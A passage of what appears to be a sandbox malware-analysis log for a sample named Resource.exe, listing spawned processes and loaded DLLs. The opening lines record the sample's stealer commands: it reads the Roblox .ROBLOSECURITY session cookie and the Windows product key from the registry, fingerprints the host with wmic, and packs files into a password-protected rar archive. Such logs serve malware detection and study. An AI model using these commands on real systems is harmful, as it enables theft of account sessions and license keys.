              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
